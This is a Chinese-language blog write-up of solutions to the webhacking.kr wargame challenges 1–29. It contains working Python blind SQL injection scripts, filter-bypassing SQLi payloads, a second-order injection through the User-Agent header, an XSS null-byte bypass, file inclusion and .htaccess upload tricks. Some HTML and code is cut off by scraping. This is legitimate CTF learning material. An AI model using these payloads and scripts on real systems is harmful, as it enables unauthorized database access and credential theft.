Webhacking.kr writeup(更新至challenge 29)
Webhacking.kr writeup
先附上题目的链接
http://webhacking.kr
challenge 1
第一个先看源码,
<a onclick=location.href='index.phps'>----- index.phps -----a>先有一个跳转,跟过去看看
又得到了一些源码,重点的如下:
$password="????";
if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>5) @solve();
echo("
level : $_COOKIE[user_lv]");
?>这里很容易就看出把cookie中的user_lv随便一个5-6之间的小树就可以了,所以直接抓包修改就行了
challenge 2
好吧这道题。。半知半解加上猜测勉强算是做出来。
回到正题。
点进去是这个样子
然后开始找线索,注意,该页的源码里面发现了很关键的东西
这就是那条龙对应的连接,点一下就进到了登录admin的界面
试了试没法儿注入,然后还发现了这里有个关键的东西:
又是要密码,试了试也没有可以注入的迹象,然后整个人都好了,看了题解之后(韩文题解,只能看懂图,爽翻。。。)
说是首页这里有问题
首页时
间注释掉了,然后通过抓包
试试这里有没有问题,把这里改成如下:
time=1460468419 and 1=1发现时间变成了
那么再试试
time=1460468419 or 1=0
所以这里是存在盲注的,那么就可以尝试爆一点东西出来,
由于无法判断是什么数据库,自然也不好直接爆,顶多爆一下库名之类没什么卵用的东西。这里主要是猜想刚才那个admin界面的表对应是admin表,然后猜解他的password字段,
对应的python代码也比较简单,贴一贴吧
import requests
import re
db_length=-1
db_name=""
url = 'http://webhacking.kr/challenge/web/web-02/index.php'
r=requests.session()
def doinject(param):
header={"Cookie":"time="+param+";PHPSESSID=58ltk3o56jd4ug007chbiorne3"}
result=r.get(url,headers=header)
content=result.content
#print content
if "09:00:01" in content:
return 1
return 0
def get_admin_pass():
global db_length
global db_name
for i in xrange(100):
param="1460468419 and if((select length(password) from admin)="+str(i)+",1,0)"
if doinject(param):
db_length=i
break
print db_length
for i in xrange(1,db_length+1):
start=48
end=122
while(start!=end):
#print str(start)+" : "+str(end)
if(end-start==1):
param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))="+str(start)+",1,0)"
if(doinject(param)):
end=start
else:
start=end
else:
mid=(start+end)/2
param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))>="+str(mid)+",1,0)"
if(doinject(param)):
start=mid
else:
end=mid
db_name+=chr(start)
print db_name
print db_name
get_admin_pass()
所以密码就是0nly_admin。
那么用这个密码去登录admin页面,得到提示:
(尼玛啊,韩文提示你大爷的。。。。百度谷歌翻译一下把)
好歹告诉了一个什么密码还是什么的东西吧。试了试不是board处的密码。
好吧,到这里就怼不动了,看看题解,发现莫名其妙的脑洞第二个表名
已跪好吧!
有了第二个表名,又来猜密码,代码都不用变,直接把表名换成FreeB0aRd就可以了,真是烦,浪费我这么多时间,结果是个脑洞。
所以board处的密码就是7598522ae。
输入之后出现个链接,给了个zip,__AdMiN__FiL2.zip,打开,是一个html文件
好吧,这个是有解压密码的,突然想到刚才在admin界面拿到的提示还没有用,那个密码@dM1n__nnanual,输入进去果然成功解压了!打开html文件
卧槽卧槽,终于出来了
所以flag就是这个了,HacKed_by_n0b0dY,好吧这道题我已经报警了,浪费了我整整快一天时间了。。。结果就尼玛脑洞过来的(好吧,可能是因为看不懂韩文,没有找到hint的位置吧)
然后去提交就行了。
challenge 3
打开就是这样一个网页
然后简单看看,只有右下角的5*5格子可以操作,看看源码也并没有什么有价值的东西
然后观察格子,最后猜测,就是每一行或每一列对应的就是我们应该画上的黑格子的数量,比如一个3,我们就要画三个连续的黑格子,比如111,我们就要画三个间隔的黑格子,所以试了试之后,如下:
出现一个输入框,先抓包看看,也没有什么异样,尝试注入,发现answer字段这里有注入的迹象
试了试之后,发现像是',or,#等等都被过滤了,最后成功的payload就是这个
用||代替or,所以根据返回来看,答案就是new_sql_injection这个了
challenge 4
一看先是个base64解码,然后又是sha1解密,接着还是sha1解密
比较简单,最后答案就是test
不做赘述
challenge 5
这道题应该是比较简单的了,我觉得明明应该是对的但还是出不来,浪费了不少时间,这里先不写,回头再来补把。
challenge 6
看源码,一堆替换,第一部分php代码就是当我们没有设定cookie的时候它会自动生成,这部分不用管。重点是第二部分,
$decode_id=$_COOKIE[user];
$decode_pw=$_COOKIE[password];
$decode_id=str_replace("!","1",$decode_id);
$decode_id=str_replace("@","2",$decode_id);
$decode_id=str_replace("$","3",$decode_id);
$decode_id=str_replace("^","4",$decode_id);
$decode_id=str_replace("&","5",$decode_id);
$decode_id=str_replace("*","6",$decode_id);
$decode_id=str_replace("(","7",$decode_id);
$decode_id=str_replace(")","8",$decode_id);
$decode_pw=str_replace("!","1",$decode_pw);
$decode_pw=str_replace("@","2",$decode_pw);
$decode_pw=str_replace("$","3",$decode_pw);
$decode_pw=str_replace("^","4",$decode_pw);
$decode_pw=str_replace("&","5",$decode_pw);
$decode_pw=str_replace("*","6",$decode_pw);
$decode_pw=str_replace("(","7",$decode_pw);
$decode_pw=str_replace(")","8",$decode_pw);
for($i=0;$i<20;$i++)
{
$decode_id=base64_decode($decode_id);
$decode_pw=base64_decode($decode_pw);
}
echo(" HINT : base64
index.phps
");
echo("ID : $decode_id
PW : $decode_pw
");
if($decode_id=="admin" && $decode_pw=="admin")
{
@solve(6,100);
}
一开始的替换也没什么用,接着是base64解密20次,解密之后的值如果和admin相等的话,那么解决问题。
这个就比较简单了,我们把adminbase64加密20次不就完了么,如下:
import base64
a = "admin"
for i in xrange(20):
a=base64.b64encode(a)
print a然后把生成的一大串东西抓包替换掉原有cookie中的user和password就行了。
challenge 7
这里源码在index.phps下面,我摘录了比较重要的部分
........
........
if(eregi("--|2|50|\+|substring|from|infor|mation|lv|%20|=|!|<>|sysM|and|or|table|column",$ck)) exit("Access Denied!");
if(eregi(' ',$ck)) { echo('cannot use space'); exit(); }
........
........
if($data[0]==2)
{
echo("");
@solve();
}
这里的随机数没有必要去想办法绕过,只要找到绕过过滤的方法,多试几次,总用一次随机数能够和你的payload对上,
这里主要是注意下过滤了空格和2,其实有很多种替换方法,比如/**/,或是编码%0a,2的话就可以变成3-1,所以构造的payload如下:
http://webhacking.kr/challenge/web/web-07/index.php?val=0)%0aunion%0aselect%0a(3-1然后多尝试几次就好了,或是写个简单的脚本:
#-+- coding:utf-8 -+-
import requests
url='http://webhacking.kr/challenge/web/web-07/index.php?val=0)%0aunion%0aselect%0a(3-1'
param={'Cookie':'PHPSESSID=iajr6agbpqaijt379p1ef14ip4'};
num=0;
while True:
r=requests.get(url,headers=param)
num+=1
print num
content = r.content
if 'nice try!' not in content:
print content
break;challenge 8
这道题的源代码也在index.phps下面,这里就是一个比较基础的二次注入。
这里我把重要的分析写在源码里面了,源码如下:
$agent=getenv("HTTP_USER_AGENT");
$ip=$_SERVER[REMOTE_ADDR];
$agent=trim($agent);
$agent=str_replace(".","_",$agent);
$agent=str_replace("/","_",$agent);
//这里各种匹配,但是关键的单引号是可以使用的
$pat="/\/|\*|union|char|ascii|select|out|infor|schema|columns|sub|-|\+|\||!|update|del|drop|from|where|order|by|asc|desc|lv|board|\([0-9]|sys|pass|\.|like|and|\'\'|sub/";
$agent=strtolower($agent);
if(preg_match($pat,$agent)) exit("Access Denied!");
//这里又重新获取了一次user-agent,然后把单引号和双引号都怼掉了,不能用了,所以这里没办法注入了
$_SERVER[HTTP_USER_AGENT]=str_replace("'","",$_SERVER[HTTP_USER_AGENT]);
$_SERVER[HTTP_USER_AGENT]=str_replace("\"","",$_SERVER[HTTP_USER_AGENT]);
$count_ck=@mysql_fetch_array(mysql_query("select count(id) from lv0"));
if($count_ck[0]>=70) { @mysql_query("delete from lv0"); }
//没办法直接注入的,因为单引号到此为止已经被匹配掉了
$q=@mysql_query("select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'");
$ck=@mysql_fetch_array($q);
if($ck)
{
echo("hi $ck[0]"
);
if($ck[0]=="admin")
{
@solve();
@mysql_query("delete from lv0");
}
}
//注入点在这里,变量$agent是可以有单引号的,而且是我们可以控制的。所以我们可以先把admin账户插入进去,然后在访问admin就行了
if(!$ck)
{
$q=@mysql_query("insert into lv0(agent,ip,id) values('$agent','$ip','guest')") or die("query error");
echo("
done! ($count_ck[0]/70)");
}
?>所以第一次我们先截包把user-agent改成如下:
admin','1','admin')#这样子执行下来,就成功把这行记录插入到了lv0表中去了。
然后我们再截一次包,直接把user-agent改成admin就成功了。
两次截图如下:
challenge 9
这里一点开是个这样子的东西,截了个包发现是这么个情况,
典型的Basic Authorization验证的,这里怎么输入密码都没有,几次尝试之后应该是不存在注入的,然后脑动一下换一个请求方式,
改成POST也不行,改成PUT一下子就进去了。
应该是这个网站限定了不能使用GET和POST,那么我们再burpsuite里设定一下,将所有包的GET请求都替换成PUT,
这里不懂的可以看一下我之前的介绍burpsuite的博客
http://blog.csdn.net/qq_19876131/article/details/50792020
然后知道当
no=1的时候回显的是apple
no=2的时候回显的是banana
np=3的时候是未知的,并给了提示那么我们得想办法爆出no=3的时候的id是啥。
进过多次尝试之后,发现很多都被过滤掉了,最后试出的payload如下:
if(substr(id,1,1)in(0x41),3,0)然后写了个脚本爆破一下id,如下:
import requests
url = "http://webhacking.kr/challenge/web/web-09/"
r=requests.session()
pw=""
def doinject(param):
headers = {"Cookie" : "PHPSESSID=brbg4rmf75uvj2gv4ff3n090i2"}
payload="no="+param
result=r.put(url,params=payload,headers=headers)
content=result.content
#print content
if "Secret" in content:
return 1
return 0
for x in xrange(1,12):
for y in xrange(32,127):
param="if(substr(id,"+str(x)+",1)in("+hex(y)+"),3,0)"
if doinject(param)>0:
pw += chr(y)
print pw
break
print pw 得到如下:
然后试了试,没有成功,全部变成小写,成功了,所以最后的密码就是
alsrkswhaql
challenge 10
这道题源代码如下:
<html>
<head>
<title>Challenge 10title>
head>
<body>
<hr style=height:100;background:brown;>
<table border=0 width=900 style=background:gray>
<tr><td>
<a id=hackme style="position:relative;left:0;top:0" onclick="this.style.posLeft+=1;if(this.style.posLeft==800)this.href='?go='+this.style.posLeft" onmouseover=this.innerHTML='yOu' onmouseout=this.innerHTML='O'>Oa><br>
<font style="position:relative;left:800;top:0" color=gold>|<br>|<br>|<br>|<br>buy lottofont>
td>tr>
table>
<hr style=height:100;background:brown;>
body>
html>
读懂js的意思,就是this.style.posLeft==800时访问http://webhacking.kr/challenge/codeing/code1.html?go=800,那我们直接访问,弹出no hack,那么这里抓个包没有发现什么异样,那就多半是Referer了,把Referer跟上,成功!
challenge 11
这里一开始看到正则如下:
$pat="/[1-3][a-f]{5}_.*218.29.102.122.*\tp\ta\ts\ts/";
if(preg_match($pat,$_GET[val])) { echo("Password is ????"); }意思就是一个匹配,匹配到就成功了,
你找一个在线测试的网站试几次就行了,这也是比较基础的正则,最后结果如下:
1aaaaa_11218129110211221111 p a s s注意要URL编码一下,答案如下:
http://webhacking.kr/challenge/codeing/code2.html?val=1aaaaa_11218129110211221111%09p%09a%09s%09schallenge 12
一道js解密的题,把源码直接全部复制到本地,然后将脚本中的eval改成document.write,放到浏览器里源代码就出来了,然后格式化一下如下:
var enco = '';
var enco2 = 126;
var enco3 = 33;
var ck = document.URL.substr(document.URL.indexOf('='));
for (i = 1; i < 122; i++) {
enco = enco + String.fromCharCode(i, 0);
}
function enco_(x) {
return enco.charCodeAt(x);
}
if (ck == "=" + String.fromCharCode(enco_(240)) + String.fromCharCode(enco_(220)) + String.fromCharCode(enco_(232)) + String.fromCharCode(enco_(192)) + String.fromCharCode(enco_(226)) + String.fromCharCode(enco_(200)) + String.fromCharCode(enco_(204)) + String.fromCharCode(enco_(222 - 2)) + String.fromCharCode(enco_(198)) + "~~~~~~" + String.fromCharCode(enco2) + String.fromCharCode(enco3)) {
alert("Password is " + ck.replace("=", ""));
}这里直接alert一下这一就出来了
String.fromCharCode(enco_(240)) + String.fromCharCode(enco_(220)) + String.fromCharCode(enco_(232)) + String.fromCharCode(enco_(192)) + String.fromCharCode(enco_(226)) + String.fromCharCode(enco_(200)) + String.fromCharCode(enco_(204)) + String.fromCharCode(enco_(222 - 2)) + String.fromCharCode(enco_(198)) + "~~~~~~" + String.fromCharCode(enco2) + String.fromCharCode(enco3)
所以得到答案就是youaregod~~~~~~~!
去首页提交一下就好了。
challenge 13
一道很直接的SQL注入题,有个hint是select flag from prob13password
简单尝试了一下,发现可以用bool盲注,输入1的时候如下:
而别的输入要么无反应,要么返回0。
这里试了一会儿,发现很多很多都被过滤了,不过select可以用的,然后像是union、and、|、&、空格、=,都被过滤了。空格这里只能用%0a代替,连/**/都被过滤了。
但是还有两个盲注很关键的东西没有过滤,if和substr,然后试到这里我们可以想到构造如下payload
0%0aor%0aif(substr((select%0aflag%0afrom%0aprob13password),1,1)in("0x41"),1,0)发现并没有回显,然后多次更改来回尝试之后,发现是flag字段的问题,比如我们尝试这样子的语句
0%0aor%0aif(substr((select%0aflag%0afrom%0aprob13password),1,1)in("0x41"),1,1)也就是说if语句永远返回1,但是最后还是没有回显,说明问题出在flag字段上,当我们换成这样子
0%0aor%0aif(substr((select%0acount(flag)%0afrom%0aprob13password),1,1)in("0x41"),1,1)于是有了回显,然后我们就意识到那个flag字段不能单独用,那就想想SQL有哪些聚合函数,最后折腾之后,想到了MAX()和MIN()函数,然后可以用substr(min(flag),1,1)代替原有的单独flag字段绕开过滤,这样子我们就一个个爆出了min(flag)的值(注意,这里MAX(flag)的值经过爆破得到是FLAG,不是最后答案)
然后写个脚本,由于是顺序猜解,速度比较慢,代码如下:
import requests
url = "http://webhacking.kr/challenge/web/web-10/"
r=requests.session()
pw=""
def doinject(param):
headers = {"Cookie" : "PHPSESSID=brbg4rmf75uvj2gv4ff3n090i2"}
payload="no="+param
result=r.get(url,params=payload,headers=headers)
content=result.content
#print content
if "1 结果如下图
所以最后的答案就是challenge13luckclear
challenge 14
源代码如下:
function ck()
{
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { alert("Password is "+ul*pw.input_pwd.value); }
else { alert("Wrong"); }
}这里直接放到firebug里面调试下就知道了,如下图:
得到值是510,所以输入510就是最后答案了,随后得到如下:
所以最后的答案就是260100,首页提交即可
challenge 15
这里再弹窗回跳的时候,答案就出来了的,随便拦截一下包就看到了
首页提交即可
challenge 16
这道题也是比较简单的js题,代码如下:
<html>
<head>
<title>Challenge 16title>
<body bgcolor=black onload=kk(1,1) onkeypress=mv(event.keyCode)>
<font color=silver id=c>font>
<font color=yellow size=100 style=position:relative id=star>*font>
<script>
document.body.innerHTML+="*";
function mv(cd)
{
kk(star.style.posLeft-50,star.style.posTop-50);
if(cd==100) star.style.posLeft=star.style.posLeft+50;
if(cd==97) star.style.posLeft=star.style.posLeft-50;
if(cd==119) star.style.posTop=star.style.posTop-50;
if(cd==115) star.style.posTop=star.style.posTop+50;
if(cd==124) location.href=String.fromCharCode(cd);
}
function kk(x,y)
{
rndc=Math.floor(Math.random()*9000000);
document.body.innerHTML+="+rndc+" id=aa style=position:relative;left:"+x+";top:"+y+" οnmοuseοver=this.innerHTML=''>*";
}
script>
body>
html>
看到就是mv函数最后当cd==124的时候大概就是我们需要的东西,所以直接构造就行了,在firebug加个事件就行了,把他的这个
onkeypress=mv(event.keyCode)改成onmouseover=mv(124),鼠标挪过去,就得到了如下:
直接去首页提交就行了。
challenge 17
直接放在firebug的console下运行即可,如下得到unlock的值,
然后的得到unlock的值,填入得到答案为999780930.7,首页提交即可
challenge 18
这道题给出了源码,如下:
if($_GET[no])
{
if(eregi(" |/|\(|\)|\t|\||&|union|select|from|0x",$_GET[no])) exit("no hack");
$q=@mysql_fetch_array(mysql_query("select id from challenge18_table where id='guest' and no=$_GET[no]"));
if($q[0]=="guest") echo ("hi guest");
if($q[0]=="admin")
{
@solve();
echo ("hi admin!");
}
}
?> 有一个简单的过滤,像是or这种关键的词没有过滤就很好办了,payload如下:
1%0aor%0a1%0alimit%0a1,1让where永真,然后通过limit语句控制选中admin即可
challenge 19
这道题出的有的莫名其妙的,只是简单的试了试,虽然不知道原因,不过就做出来了。
在尝试的时候先是截包,然后修改admin',发现不行,接着是admin%27也不行,然后又试了试admin%2527,发现打印了admin27,那么就意味着中间的%25被河蟹了,那么说我直接输入admin%25也应该可以的吧。然后果然就成功了,这就是说答案也可以是admin%,后来想了想,可能是通配符的缘故,然后果断试了试admin*果然也成功了。这道题就先这样了吧。
challenge 20
好吧这道题。。。。。
时限是2s,然后应该就是简单的输入两个几个值,关键就是怎么2s交上去,然后又说了不是编程,提示是JS,那么就在firebug的console里面搞就行了,如下:
lv5frm.id.value='123';
lv5frm.cmt.value='123';
lv5frm.hack.value=lv5frm.attackme.value;
lv5frm.submit();
多刷新几次就成功了!
challenge 21
做完之后没有保存,懒得再写了。
challenge 22
这道题一来是直接可以盲注的,一个id字段。另一个也很好猜,就是pw字段。
它在login界面有两种回显,一种是
另一种就是这个
依靠这个我们可以开始盲注,贴一下脚本吧:
import requests
url = "http://webhacking.kr/challenge/bonus/bonus-2/index.php"
r=requests.session()
pw=""
def doinject(param):
headers = {"Cookie" : "PHPSESSID=pcpmvjp3vc020q2ebsd7p6mkc6"}
payload={"id":param}
#print payload
result=r.post(url,data=payload,headers=headers)
content=result.content
#print content
if "Wrong password!" in content:
return 1
return 0
for x in xrange(1,33):
for y in xrange(32,127):
param="admin' and if(substr(pw,"+str(x)+",1)='"+chr(y)+"',1,0)#"
#print param
#print str(x)+" : "+chr(y)
if doinject(param)>0:
pw += chr(y)
print pw
break
print pw运行结果如下:
所以admin的密码的md5就是2a93a7cea083c6e9e02c97ec5a5d715a,去解码下得到原文是rainbowzombie。
提交答案但是不对,那么问题来了。。
确实,join页面我们还没有使用过。。
我们先随便join一个账户名和密码都是1的,成功之后去登录
得到了密码的hash,解码之后的值是1zombie,很容易意识到网页在MD5进行hash的时候是加了salt的,这样子,刚刚盲注得到的rainbowzombie中真正的密码就是rainbow。
challenge 23 (XSS)
一直不怎么会XSS,这道题也是比较奇怪,一旦<后面匹配到sc、in、on什么的直接报no hack,想到用%00截断一下,结果直接就过了
<s%00cript>alert(1);script> challenge 24
根据提示进入index.phps看到源码,这里就不贴了,它会从cookie里面获取名为REMOTE_ADDR的值,然后关机的过滤如下:
if($_COOKIE[REMOTE_ADDR])
{
$ip=str_replace("12","",$ip);
$ip=str_replace("7.","",$ip);
$ip=str_replace("0.","",$ip);
}根据上面的代码,构造一个
REMOTE_ADDR=112277..00..00..1既可以绕过了。
然后截包在cookie里面添加上REMOTE_ADDR=112277..00..00..1就可以了。
challenge 25
好吧这道题真是奇怪。。哔了狗了。。这道题一进去看到连接file=hello,知道肯定是hello.txt的内容,然后直接试试index.php%00,发现还是看到显示hello world,我还以为%00截断不行。。最后还是就是直接的password.php%00,它的坑点就在于那个该死的index.php里面的内容和hello.txt一样都是hello world。坑了我半天,擦。
Challenge 25 password is ~~nullbye2~~答案是
~~nullbye2~~challenge 26
题目越来越简单的感觉,看源码如下:
if(eregi("admin",$_GET[id])) { echo("no!"
); exit(); }
$_GET[id]=urldecode($_GET[id]);
if($_GET[id]=="admin")
{
@solve(26,100);
}中间代码进行了一次url解码,那么我们直接对admin两次url编码就可以了,paylaod
http://webhacking.kr/challenge/web/web-11/index.php?id=%2561%2564%256D%2569%256Echallenge 27
同样在index.phps下面看到源代码
if($_GET[no])
{
if(eregi("#|union|from|challenge|select|\(|\t|/|limit|=|0x",$_GET[no])) exit("no hack");
$q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error");
if($q[id]=="guest") echo("guest");
if($q[id]=="admin") @solve();
}
?>看到union和select都被过滤了,那么就多半不是union查询了,然后看看mysql_fetch_array,知道它是去除结果集中的一条记录,那么就想到了把中所有内容选出来排序,这样在执行mysql_fetch_array函数的时候,就能把admin那条记录取走。
payload如下:
http://webhacking.kr/challenge/web/web-12/index.php?no=-1) or 1 order by id asc--+challenge 28
一开始,先访问下upload/index.php,看到一个read me,然后看到最开始的提示,
pw的值在index.php里面看到,然后随便上传一个文件
看到这样的提示,提示.htaccess,然后就知道应该是把upload目录下的php禁用掉,这样子我们就能够下载下来upload/index.php,就能够拿到pw了,所以我们创建一个.htaccess,内容就是
php_flag engine off上传上去,然后就成功了。
challenge 29
这道题提示是个注入什么的,还是先随便上传个文件,发现成功之后会把time,ip,file存入数据库什么的,然后从中选入,应该是一个update,注入点多半就在filename这里,那么我们预估一下这个表就是3个字段,试了很多次之后,发现它的插入顺序是“file,time,ip”,这里用Burpsuite就可以抓包看到filename然后开始注入,而且还要注意的是,ip一定要和你自己ip一样,就是随便上传一个文件就能看到自己的ip,由于过滤了.,所以需要用到数据库的CHAR()函数,如下图:
最后试出来的payload是这个:
2',(select password from c29_tb),CHAR(50, 49, 56, 46, 50, 57, 46, 49, 48, 50, 46, 49, 48, 50))#